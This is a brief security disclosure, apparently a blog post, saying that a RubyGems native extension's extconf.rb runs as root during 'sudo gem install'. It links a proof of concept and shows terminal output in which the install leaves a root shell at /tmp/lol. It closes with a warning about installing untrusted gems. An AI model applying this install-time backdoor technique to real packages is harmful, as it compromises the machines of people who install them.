Another hilarious and trivial rubygems exploit. The file ext/<ext>/extconf.rb gets executed as root during installation. A malicious gem could put code in there that installs a backdoor. Demonstration PoC: https://github.com/m4rkw/rubygems-poc2 $ ls -la /tmp/lol<br/> ls: cannot access /tmp/lol: No such file or directory<br/> $ sudo gem install file-4.3.2.gem <br/> Building native extensions. This could take a while...<br/> Successfully installed file-4.3.2<br/> Parsing documentation for file-4.3.2<br/> Done installing documentation for file after 0 seconds<br/> 1 gem installed<br/> $ /tmp/lol<br/> # id<br/> uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)<br/> # <br/> Again, be *very* careful what gems you install!